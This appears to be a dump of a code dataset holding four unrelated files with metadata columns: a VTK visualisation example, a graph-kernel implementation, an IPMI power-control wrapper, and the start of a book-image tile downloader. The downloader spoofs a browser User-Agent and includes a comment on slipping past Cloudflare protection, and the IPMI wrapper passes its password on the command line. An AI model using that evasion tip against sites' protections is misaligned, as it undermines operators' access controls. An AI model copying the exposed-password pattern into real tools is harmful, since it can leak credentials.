| 0.668567
| false
| 3.813665
| true
| false
| false
|
hlzz/dotfiles
|
graphics/VTK-7.0.0/Examples/DataManipulation/Python/FinancialField.py
|
1
|
8881
|
#!/usr/bin/env python
# This example demonstrates the use of fields and use of
# vtkProgrammableDataObjectSource. It creates fields the hard way (as
# compared to reading a vtk field file), but shows you how to
# interface to your own raw data.
import os
import re
import vtk
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
xAxis = "INTEREST_RATE"
yAxis = "MONTHLY_PAYMENT"
zAxis = "MONTHLY_INCOME"
scalar = "TIME_LATE"
def getNumberFromLine(line):
patn = re.compile(r'[-+]{0,1}[\d.]+e?[-+\d]*', re.M)
val = patn.findall(line)
ret = []
for i in val:
ret.append(float(i))
return ret
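# e.g. getNumberFromLine("8 values: 1.5e-2 -7 .25") gives
# [8.0, 0.015, -7.0, 0.25] (every numeric token on the line, as floats).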
# Parse an ASCII file and manually create a field. Then construct a
# dataset from the field.
dos = vtk.vtkProgrammableDataObjectSource()
# First define the function that will parse the data.
def parseFile():
global VTK_DATA_ROOT, dos
# Use Python to read an ASCII file
file = open(os.path.join(VTK_DATA_ROOT, "Data/financial.txt"), "r")
line = file.readline()
numPts = int(getNumberFromLine(line)[0])
numLines = (numPts - 1)//8
# Get the data object's field data and allocate
# room for 4, fields
fieldData = dos.GetOutput().GetFieldData()
fieldData.AllocateArrays(4)
# read TIME_LATE - dependent variable
# search the file until an array called TIME_LATE is found
while file.readline()[:9] != "TIME_LATE":
pass
# Create the corresponding float array
timeLate = vtk.vtkFloatArray()
timeLate.SetName("TIME_LATE")
# Read the values
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
timeLate.InsertNextValue(val[j])
# Add the array
fieldData.AddArray(timeLate)
# MONTHLY_PAYMENT - independent variable
while file.readline()[:15] != "MONTHLY_PAYMENT":
pass
monthlyPayment = vtk.vtkFloatArray()
monthlyPayment.SetName("MONTHLY_PAYMENT")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyPayment.InsertNextValue(val[j])
fieldData.AddArray(monthlyPayment)
# UNPAID_PRINCIPLE - skip
while file.readline()[:16] != "UNPAID_PRINCIPLE":
pass
for i in range(0, numLines):
file.readline()
# LOAN_AMOUNT - skip
while file.readline()[:11] != "LOAN_AMOUNT":
pass
for i in range(0, numLines):
file.readline()
# INTEREST_RATE - independent variable
while file.readline()[:13] != "INTEREST_RATE":
pass
interestRate = vtk.vtkFloatArray()
interestRate.SetName("INTEREST_RATE")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
interestRate.InsertNextValue(val[j])
fieldData.AddArray(interestRate)
# MONTHLY_INCOME - independent variable
while file.readline()[:14] != "MONTHLY_INCOME":
pass
monthlyIncome = vtk.vtkFloatArray()
monthlyIncome.SetName("MONTHLY_INCOME")
for i in range(0, numLines):
val = getNumberFromLine(file.readline())
for j in range(0, 8):
monthlyIncome.InsertNextValue(val[j])
fieldData.AddArray(monthlyIncome)
# Arrange to call the parsing function when the programmable data
# source is executed.
dos.SetExecuteMethod(parseFile)
# Create the dataset.
# DataObjectToDataSetFilter can create geometry using fields from
# DataObject's FieldData
do2ds = vtk.vtkDataObjectToDataSetFilter()
do2ds.SetInputConnection(dos.GetOutputPort())
# We are generating polygonal data
do2ds.SetDataSetTypeToPolyData()
do2ds.DefaultNormalizeOn()
# All we need is points. Assign them.
do2ds.SetPointComponent(0, xAxis, 0)
do2ds.SetPointComponent(1, yAxis, 0)
do2ds.SetPointComponent(2, zAxis, 0)
# RearrangeFields is used to move fields between DataObject's
# FieldData, PointData and CellData.
rf = vtk.vtkRearrangeFields()
rf.SetInputConnection(do2ds.GetOutputPort())
# Add an operation to "move TIME_LATE from DataObject's FieldData to
# PointData"
rf.AddOperation("MOVE", scalar, "DATA_OBJECT", "POINT_DATA")
# Force the filter to execute. This is needed to force the pipeline
# to execute so that we can find the range of the array TIME_LATE.
rf.Update()
# Set max to the second (GetRange returns [min,max]) of the "range of the
# array called scalar in the PointData of the output of rf"
scalar_max = rf.GetOutput().GetPointData().GetArray(scalar).GetRange()[1]
# Use an ArrayCalculator to normalize TIME_LATE
calc = vtk.vtkArrayCalculator()
calc.SetInputConnection(rf.GetOutputPort())
# Working on point data
calc.SetAttributeModeToUsePointData()
# Map scalar to s. When setting function, we can use s to
# represent the array scalar (TIME_LATE)
calc.AddScalarVariable("s", scalar, 0)
# Divide scalar by scalar_max (applies division to all components of the array)
calc.SetFunction("s / %f" % scalar_max)
# The output array will be called resArray
calc.SetResultArrayName("resArray")
# Use AssignAttribute to make resArray the active scalar field
aa = vtk.vtkAssignAttribute()
aa.SetInputConnection(calc.GetOutputPort())
aa.Assign("resArray", "SCALARS", "POINT_DATA")
aa.Update()
# construct pipeline for original population
# GaussianSplatter -> Contour -> Mapper -> Actor
popSplatter = vtk.vtkGaussianSplatter()
popSplatter.SetInputConnection(aa.GetOutputPort())
popSplatter.SetSampleDimensions(50, 50, 50)
popSplatter.SetRadius(0.05)
popSplatter.ScalarWarpingOff()
popSurface = vtk.vtkContourFilter()
popSurface.SetInputConnection(popSplatter.GetOutputPort())
popSurface.SetValue(0, 0.01)
popMapper = vtk.vtkPolyDataMapper()
popMapper.SetInputConnection(popSurface.GetOutputPort())
popMapper.ScalarVisibilityOff()
popActor = vtk.vtkActor()
popActor.SetMapper(popMapper)
popActor.GetProperty().SetOpacity(0.3)
popActor.GetProperty().SetColor(.9, .9, .9)
# This is for decoration only.
def CreateAxes():
global xAxis, yAxis, zAxis, popSplatter
# Create axes.
popSplatter.Update()
bounds = popSplatter.GetOutput().GetBounds()
axes = vtk.vtkAxes()
axes.SetOrigin(bounds[0], bounds[2], bounds[4])
axes.SetScaleFactor(popSplatter.GetOutput().GetLength()/5.0)
axesTubes = vtk.vtkTubeFilter()
axesTubes.SetInputConnection(axes.GetOutputPort())
axesTubes.SetRadius(axes.GetScaleFactor()/25.0)
axesTubes.SetNumberOfSides(6)
axesMapper = vtk.vtkPolyDataMapper()
axesMapper.SetInputConnection(axesTubes.GetOutputPort())
axesActor = vtk.vtkActor()
axesActor.SetMapper(axesMapper)
# Label the axes.
XText = vtk.vtkVectorText()
XText.SetText(xAxis)
XTextMapper = vtk.vtkPolyDataMapper()
XTextMapper.SetInputConnection(XText.GetOutputPort())
XActor = vtk.vtkFollower()
XActor.SetMapper(XTextMapper)
XActor.SetScale(0.02, .02, .02)
XActor.SetPosition(0.35, -0.05, -0.05)
XActor.GetProperty().SetColor(0, 0, 0)
YText = vtk.vtkVectorText()
YText.SetText(yAxis)
YTextMapper = vtk.vtkPolyDataMapper()
YTextMapper.SetInputConnection(YText.GetOutputPort())
YActor = vtk.vtkFollower()
YActor.SetMapper(YTextMapper)
YActor.SetScale(0.02, .02, .02)
YActor.SetPosition(-0.05, 0.35, -0.05)
YActor.GetProperty().SetColor(0, 0, 0)
ZText = vtk.vtkVectorText()
ZText.SetText(zAxis)
ZTextMapper = vtk.vtkPolyDataMapper()
ZTextMapper.SetInputConnection(ZText.GetOutputPort())
ZActor = vtk.vtkFollower()
ZActor.SetMapper(ZTextMapper)
ZActor.SetScale(0.02, .02, .02)
ZActor.SetPosition(-0.05, -0.05, 0.35)
ZActor.GetProperty().SetColor(0, 0, 0)
return axesActor, XActor, YActor, ZActor
axesActor, XActor, YActor, ZActor = CreateAxes()
# Create the render window, renderer, interactor
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
renWin.SetWindowName("vtk - Field Data")
renWin.SetSize(500, 500)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
ren.AddActor(axesActor)
ren.AddActor(XActor)
ren.AddActor(YActor)
ren.AddActor(ZActor)
ren.AddActor(popActor)
ren.SetBackground(1, 1, 1)
# Set the default camera position
camera = vtk.vtkCamera()
camera.SetClippingRange(.274, 13.72)
camera.SetFocalPoint(0.433816, 0.333131, 0.449)
camera.SetPosition(-1.96987, 1.15145, 1.49053)
camera.SetViewUp(0.378927, 0.911821, 0.158107)
ren.SetActiveCamera(camera)
# Assign the camera to the followers.
XActor.SetCamera(camera)
YActor.SetCamera(camera)
ZActor.SetCamera(camera)
iren.Initialize()
renWin.Render()
iren.Start()
|
bsd-3-clause
| -383,774,845,512,799,740
| 29.492908
| 73
| 0.695079
| false
| 3.275913
| false
| false
| false
|
nickgentoo/scikit-learn-graph
|
skgraph/kernel/WLOrthoGraphKernel.py
|
1
|
15954
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 3 12:04:44 2015
Copyright 2015 Nicolo' Navarin
This file is part of scikit-learn-graph.
scikit-learn-graph is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
scikit-learn-graph is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with scikit-learn-graph. If not, see <http://www.gnu.org/licenses/>.
The code is from the following source.
Weisfeiler_Lehman graph kernel.
Python implementation of Nino Shervashidze Matlab code at:
http://mlcb.is.tuebingen.mpg.de/Mitarbeiter/Nino/Graphkernels/
Author : Sandro Vega Pons
License:
"""
import numpy as np
import networkx as nx
import copy
import math
from KernelTools import convert_to_sparse_matrix
from graphKernel import GraphKernel
from scipy.sparse import dok_matrix
from sklearn import preprocessing as pp
class WLOrthoGraphKernel(GraphKernel):
"""
Weisfeiler_Lehman graph kernel.
"""
def __init__(self, r = 1, normalization = False):
self.h=r
self.normalization=normalization
self.__startsymbol='!' #special symbols used in encoding
self.__conjsymbol='#'
self.__endsymbol='?'
self.__fsfeatsymbol='*'
self.__version=0
self.__contextsymbol='@'
def kernelFunction(self, g_1, g_2):
"""Compute the kernel value (similarity) between two graphs.
Parameters
----------
g1 : networkx.Graph
First graph.
g2 : networkx.Graph
Second graph.
h : interger
Number of iterations.
nl : boolean
Whether to use original node labels. True for using node labels
saved in the attribute 'node_label'. False for using the node
degree of each node as node attribute.
Returns
-------
k : The similarity value between g1 and g2.
"""
gl = [g_1, g_2]
return self.computeGrams(gl)[0, 1]
def transform(self, graph_list):
"""
TODO
"""
n = len(graph_list) #number of graphs
# list of the orthogonalized phi: phis[i] is the phi of the i-th iteration of the WL test.
phis=[]
for i in range(self.h+1):
phis.append({})
NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
label_lookup = {} #map from features to corresponding id
label_counter = 0 #incremental value for label ids
for i in range(n): #for each graph
NodeIdToLabelId[i] = {}
for j in graph_list[i].nodes(): #for each node
if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
label_lookup[graph_list[i].node[j]['label']] = label_counter
NodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
if not phis[0].has_key((i,feature)):
phis[0][(i,feature)]=0.0
phis[0][(i,feature)]+=1.0
# here we have phi[0]
### MAIN LOOP
# phis[0] already holds the iteration-0 (original label) features above,
# so the context iterations fill phis[1]..phis[self.h].
it = 1
NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of next iteration
while it <= self.h: #each iteration computes the next labellings (that are contexts of the previous)
label_lookup = {}
for i in range(n): #for each graph
for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
neighbors=[]
for u in graph_list[i].neighbors(j):
neighbors.append(NodeIdToLabelId[i][u])
neighbors.sort() #sorting neighbours
long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
for u in neighbors:
long_label_string+=str(u)+self.__conjsymbol
long_label_string=long_label_string[:-1]+self.__endsymbol
if not label_lookup.has_key(long_label_string):
label_lookup[long_label_string] = label_counter
NewNodeIdToLabelId[i][j] = label_counter
label_counter += 1
else:
NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
if not phis[it].has_key((i,feature)):
phis[it][(i,feature)]=0.0
phis[it][(i,feature)]+=1.0
# here we have phi[it]
NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
it = it + 1
ves = [convert_to_sparse_matrix(phi) for phi in phis]
if self.normalization:
ves = [pp.normalize(ve, norm='l2', axis=1) for ve in ves]
return ves
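# Illustrative call (assumes networkx graphs whose nodes carry a 'label'
# attribute, as required by transform() above):
# k = WLOrthoGraphKernel(r=2)
# phis = k.transform([g1, g2]) # one sparse phi matrix per WL iteration
# grams = k.computeGrams([g1, g2]) # list of per-iteration Gram matrices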
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [dict() for x in range(n)] # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = long(1) #incremental value for label ids
#
# for i in range(n): #for each graph
# #NodeIdToLabelId[i] = {}
# #nx.draw(graph_list[i])
#
#
# for j in graph_list[i].nodes(): #for each node
# if not label_lookup.has_key(graph_list[i].node[j]['label']):#update label_lookup and label ids from first iteration that consider node's labels
# label_lookup[graph_list[i].node[j]['label']] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[graph_list[i].node[j]['label']]
#
# feature=self.__fsfeatsymbol+str(label_lookup[graph_list[i].node[j]['label']])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId) #labels id of nex iteration
#
# while it < self.h: #each iteration compute the next labellings (that are contexts of the previous)
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort() #sorting neighbours
#
# long_label_string=str(NodeIdToLabelId[i][j])+self.__startsymbol #compute new labels id
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# feature=self.__fsfeatsymbol+str(NewNodeIdToLabelId[i][j])
# if not phi.has_key((i,feature)):
# phi[(i,feature)]=0.0
# phi[(i,feature)]+=1.0
#
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId) #update current labels id
# it = it + 1
# #print phi
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
# #phi=dok_matrix()
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 0 #incremental value for label ids
#
# for i in xrange(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# enc=graph_list[i].node[j]['label'] #"0"+
# if enc not in label_lookup:#update label_lookup and label ids
# label_lookup[enc] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup[enc]
# #print enc, label_lookup[enc]
# if (i,label_lookup[enc]) not in phi:
# phi[i,label_lookup[enc]]=0
# phi[i,label_lookup[enc]]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #label_lookup = {}
#
# while it < self.h:
# label_lookup = {}
#
# for i in xrange(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u,
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# #print
# long_label_string=str(NodeIdToLabelId[i][j])#str(it+1)+self.__startsymbol+
# for u in neighbors:
# long_label_string+=self.__conjsymbol+str(u)
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# if long_label_string not in label_lookup:
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
# print long_label_string, NewNodeIdToLabelId[i][j]
#
# if (i,NewNodeIdToLabelId[i][j]) not in phi:
# phi[i,NewNodeIdToLabelId[i][j]]=0
# phi[i,NewNodeIdToLabelId[i][j]]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# #return dok_matrix(phi.todense()).tocsr()
# return convert_to_sparse_matrix(phi)
# def transform(self, graph_list):
# """
# TODO
# """
# n = len(graph_list) #number of graphs
#
# phi={} #dictionary representing the phi vector for each graph. phi[r][c]=v each row is a graph. each column is a feature
#
# NodeIdToLabelId = [0] * n # NodeIdToLabelId[i][j] is labelid of node j in graph i
# label_lookup = {} #map from features to corresponding id
# label_counter = 1 #incremental value for label ids
#
# for i in range(n): #for each graph
# NodeIdToLabelId[i] = {}
#
# for j in graph_list[i].nodes():
# #print graph_list[i].node[j]['label']
# if not label_lookup.has_key("0|"+str(graph_list[i].node[j]['label'])):#update label_lookup and label ids
# label_lookup["0|"+str(graph_list[i].node[j]['label'])] = label_counter
# NodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NodeIdToLabelId[i][j] = label_lookup["0|"+str(graph_list[i].node[j]['label'])]
#
# if not phi.has_key((i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])):
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]=0
# phi[(i,label_lookup["0|"+str(graph_list[i].node[j]['label'])])]+=1
#
# ### MAIN LOOP
# it = 0
# NewNodeIdToLabelId = copy.deepcopy(NodeIdToLabelId)
# #NewNodeIdToLabelId =[0] * n
# while it < self.h:
# label_lookup = {}
#
# for i in range(n): #for each graph
# for j in graph_list[i].nodes(): #for each node, consider its neighbourhood
# neighbors=[]
# for u in graph_list[i].neighbors(j):
# #print u
# neighbors.append(NodeIdToLabelId[i][u])
# neighbors.sort()
# if len(neighbors)==0:
# print "Empty neighbors"
# #MODIFICATO RISPETTO a TESSELLI str(it)+self.__startsymbol+
# long_label_string=str(it+1)+"|"+str(NodeIdToLabelId[i][j])+self.__startsymbol
# for u in neighbors:
# long_label_string+=str(u)+self.__conjsymbol
# #long_label_string=long_label_string[:-1]+self.__endsymbol
# long_label_string=long_label_string[:-1]+self.__endsymbol
#
# if len(neighbors)==0:
# print long_label_string
#
# if not label_lookup.has_key(long_label_string):
# label_lookup[long_label_string] = label_counter
# NewNodeIdToLabelId[i][j] = label_counter
# label_counter += 1
# else:
# NewNodeIdToLabelId[i][j] = label_lookup[long_label_string]
#
# if not phi.has_key((i,NewNodeIdToLabelId[i][j])):
# phi[(i,NewNodeIdToLabelId[i][j])]=0
# phi[(i,NewNodeIdToLabelId[i][j])]+=1
#
# NodeIdToLabelId = copy.deepcopy(NewNodeIdToLabelId)
# it = it + 1
# return convert_to_sparse_matrix(phi)
# def __normalization(self, gram):
# """
# TODO
# """
# if self.normalization:
# diagonal=np.diag(gram)
# a=np.tile(diagonal,(gram.shape[0],1))
# b=diagonal.reshape((gram.shape[0],1))
# b=np.tile(b,(1,gram.shape[1]))
#
# return gram/np.sqrt(a*b)
# else :
# return gram
def computeKernelMatrixTrain(self,Graphs):
return self.computeGrams(Graphs)
def computeGrams(self,g_it,ps=None):
if ps is None:
ps=self.transform(g_it)
return [precomputed.dot(precomputed.T).todense().tolist() for precomputed in ps]
|
gpl-3.0
| 6,825,893,100,655,079,000
| 41.772118
| 160
| 0.521938
| false
| 3.715417
| false
| false
| false
|
stroucki/tashi
|
src/zoni/hardware/ipmi.py
|
2
|
3580
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# $Id$
#
import subprocess
import logging
from systemmanagementinterface import SystemManagementInterface
#class systemmagement():
#def __init__(self, proto):
#self.proto = proto
class Ipmi(SystemManagementInterface):
def __init__(self, config, nodeName, hostInfo):
# should send data obj instead of hostInfo
self.config = config
self.nodeName = nodeName + "-ipmi"
self.password = hostInfo['ipmi_password']
self.user = hostInfo['ipmi_user']
self.powerStatus = None
self.verbose = False
self.log = logging.getLogger(__name__)
self.ipmicmd = "ipmitool -I lanplus -U %s -H %s -P %s " % (self.user, self.nodeName, self.password)
print self.ipmicmd
def setVerbose(self, verbose):
self.verbose = verbose
def __executeCmd(self, cmd):
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out = a.stdout.readline()
err = a.stderr.readline()
if self.verbose:
print "out is ", out
print "err is ", err
if err:
self.log.info("%s %s" % (self.nodeName, err))
return -1
self.log.info("%s %s" % (self.nodeName, out))
return 1
def __setPowerStatus(self):
if self.verbose:
print self.ipmicmd
cmd = self.ipmicmd + "chassis power status"
a = subprocess.Popen(args=cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
output = a.stdout.readline()
myerr = a.stderr.readline()
if "off" in output:
self.powerStatus = 0
if "on" in output:
self.powerStatus = 1
if "Unable" in myerr:
self.powerStatus = -1
return output
def isPowered(self):
if self.powerStatus is None:
self.__setPowerStatus()
self.log.info("Hardware get power status : %s", self.powerStatus)
return self.powerStatus
def getPowerStatus(self):
#self.log.info("getPowerStatus :%s" % self.nodeName)
return self.isPowered()
def powerOn(self):
self.log.info("Hardware power on : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power on"
return self.__executeCmd(cmd)
def powerOff(self):
self.log.info("Hardware power off : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power off"
return self.__executeCmd(cmd)
def powerOffSoft(self):
self.log.info("Hardware power off (soft): %s", self.nodeName)
cmd = self.ipmicmd + "chassis power soft"
return self.__executeCmd(cmd)
def powerCycle(self):
self.log.info("Hardware power cycle : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power cycle"
return self.__executeCmd(cmd)
def powerReset(self):
self.log.info("Hardware power reset : %s", self.nodeName)
cmd = self.ipmicmd + "chassis power reset"
return self.__executeCmd(cmd)
def activateConsole(self):
self.log.info("Hardware sol activate : %s", self.nodeName)
cmd = self.ipmicmd + "sol activate"
return self.__executeCmd(cmd)
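# Usage sketch (hypothetical nodeName/hostInfo values, not part of this module):
#
#	hostInfo = {"ipmi_user": "admin", "ipmi_password": "secret"}
#	ipmi = Ipmi(config, "node01", hostInfo)
#	if not ipmi.isPowered():
#		ipmi.powerOn()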
|
apache-2.0
| 2,151,156,001,504,405,200
| 29.084034
| 101
| 0.705866
| false
| 3.228133
| false
| false
| false
|
georgthegreat/dancebooks-bibtex
|
scripts/lib.py
|
1
|
31786
|
#!/usr/bin/env python3
import functools
import http.client
import json
import math
import os
import subprocess
import shutil
import sys
import time
import uuid
from xml.etree import ElementTree
import bs4
import opster
import requests
#NOTE: if the website is protected by cloudflare, removing User-Agent header will help to pass it by
USER_AGENT = "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:62.0) Gecko/20100101 Firefox/62.0"
HEADERS = {
"User-Agent": USER_AGENT
}
TIMEOUT = 30
###################
#UTILITY FUNCTIONS
###################
def retry(retry_count, delay=0, delay_backoff=1):
def actual_decorator(func):
@functools.wraps(func)
		def do_retry(*args, **kwargs):
			retry_number = 0
			current_delay = delay
			# loop so the call is actually re-attempted up to retry_count times
			while True:
				try:
					return func(*args, **kwargs)
				except Exception:
					if retry_number >= retry_count:
						raise RuntimeError(f"Failed to get results after {retry_number} retries")
					time.sleep(current_delay)
					current_delay *= delay_backoff
					retry_number += 1
		return do_retry
return actual_decorator
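#Example (sketch): retry a flaky call up to 3 times with exponential backoff.
#The decorated function below is hypothetical and only illustrates the wiring:
#
#	@retry(retry_count=3, delay=1, delay_backoff=2)
#	def fetch_metadata():
#		return get_json("https://example.org/info.json")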
#using single session for all requests
session = requests.Session()
#@retry(retry_count=3)
def make_request(*args, **kwargs):
"""
Performs the request and returns requests.Response object.
Accepts both raw urls and prepared requests
"""
if isinstance(args[0], str):
url = args[0]
response = requests.get(*args, headers=HEADERS, timeout=TIMEOUT, **kwargs)
elif isinstance(args[0], requests.Request):
request = args[0].prepare()
url = request.url
args = args[1:]
request.headers = HEADERS
		response = session.send(request, *args, timeout=TIMEOUT, **kwargs)
	else:
		raise TypeError(f"Expected str or requests.Request as the first argument, got {type(args[0])}")
if response.status_code == 200:
return response
else:
raise ValueError(f"While getting {url}: HTTP status 200 was expected. Got {response.status_code}")
#@retry(retry_count=3)
def get_json(*args, **kwargs):
"""
Returns parsed JSON object received via HTTP GET request
"""
return json.loads(make_request(*args, **kwargs).content)
def get_xml(*args, **kwargs):
"""
Returns parsed xml (as ElementTree) received via HTTP GET request
"""
return ElementTree.fromstring(make_request(*args, **kwargs).content)
def get_text(*args, **kwargs):
return make_request(*args, **kwargs).content.decode("utf-8")
def get_binary(output_filename, url_or_request, *args, **kwargs):
"""
Writes binary data received via HTTP GET request to output_filename
Accepts both url as string and request.Requests
"""
BLOCK_SIZE = 4096
response = make_request(url_or_request, *args, stream=True, **kwargs)
with open(output_filename, "wb") as file:
for chunk in response.iter_content(BLOCK_SIZE):
file.write(chunk)
def make_output_folder(downloader, book_id):
folder_name = "{downloader}_{book_id}".format(
downloader=downloader,
book_id=book_id\
.replace('/', '_')
.replace(':', '_')
)
os.makedirs(folder_name, exist_ok=True)
return folder_name
def make_output_filename(base, page=None, extension="bmp"):
result = base
if isinstance(page, int):
result = os.path.join(result, f"{page:08}")
elif page is not None:
result = os.path.join(result, page)
if extension is not None:
result += "." + extension
return result
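#Examples of the naming scheme above (POSIX paths, values derived from the code):
#	make_output_filename("folder", page=3) -> "folder/00000003.bmp"
#	make_output_filename("folder", page="f005r", extension="jpg") -> "folder/f005r.jpg"
#	make_output_filename("folder", page=3, extension=None) -> "folder/00000003"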
def make_temporary_folder():
return str(uuid.uuid4())
class TileSewingPolicy(object):
def __init__(self, tiles_number_x, tiles_number_y, tile_size, image_width=None, image_height=None, overlap=None):
self.tiles_number_x = tiles_number_x
self.tiles_number_y = tiles_number_y
self.tile_size = tile_size
self.image_width = image_width
self.image_height = image_height
self.overlap = overlap
@staticmethod
def from_image_size(width, height, tile_size):
tiles_number_x = math.ceil(width / tile_size)
tiles_number_y = math.ceil(height / tile_size)
return TileSewingPolicy(tiles_number_x, tiles_number_y, tile_size, image_width=width, image_height=height)
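#Worked example: a 3590x3507 image with 256-pixel tiles yields
#ceil(3590 / 256) x ceil(3507 / 256) = 15 x 14 tiles.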
def sew_tiles_with_montage(folder, output_file, policy):
"""
Invokes montage tool from ImageMagick package to sew tiles together
"""
def format_magick_geometry(policy):
geometry = ""
if policy.tile_size is not None:
geometry += f"{policy.tile_size}x{policy.tile_size}"
if policy.overlap is not None:
geometry += f"-{policy.overlap}-{policy.overlap}"
if geometry:
#WARN:
# Do not allow enlarging tiles.
# Certain libraries (i. e. Gallica) use variable tile size
geometry += '>'
return geometry
def format_magick_tile(policy):
return f"{policy.tiles_number_x}x{policy.tiles_number_y}"
# Sewing tiles
cmd_line = [
"montage",
f"{folder}/*",
"-mode", "Concatenate"
]
geometry = format_magick_geometry(policy)
if geometry:
cmd_line += ["-geometry", geometry]
cmd_line += [
"-tile", format_magick_tile(policy),
output_file
]
print(f"Sewing tiles with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
if policy.image_width and policy.image_height:
# Cropping extra boundaries (right and bottom) added during sewing
cmd_line = [
"convert",
output_file,
"-extent", f"{policy.image_width}x{policy.image_height}",
output_file
]
print(f"Cropping output image with:\n {' '.join(cmd_line)}")
subprocess.check_call(cmd_line)
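#For the 15x14 example above, the generated commands look roughly like:
#	montage <tmp_folder>/* -mode Concatenate -geometry '256x256>' -tile 15x14 out.bmp
#	convert out.bmp -extent 3590x3507 out.bmp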
def download_and_sew_tiles(output_filename, url_maker, policy):
	if os.path.exists(output_filename):
		print(f"Skip downloading existing file {output_filename}")
		return
tmp_folder = make_temporary_folder()
os.mkdir(tmp_folder)
try:
print(f"Downloading {policy.tiles_number_x}x{policy.tiles_number_y} tiled image to {output_filename}")
for tile_x in range(policy.tiles_number_x):
for tile_y in range(policy.tiles_number_y):
tile_file = os.path.join(tmp_folder, f"{tile_y:08d}_{tile_x:08d}.jpg")
get_binary(
tile_file,
url_maker(tile_x, tile_y)
)
sew_tiles_with_montage(tmp_folder, output_filename, policy)
finally:
if "KEEP_TEMP" not in os.environ:
shutil.rmtree(tmp_folder)
class IIPMetadata(object):
def __init__(self, tile_size, width, height, max_level):
self.tile_size = tile_size
self.width = width
self.height = height
self.max_level = max_level
@staticmethod
def from_json(json):
tile_size = 256
width = int(json["d"][-1]["w"])
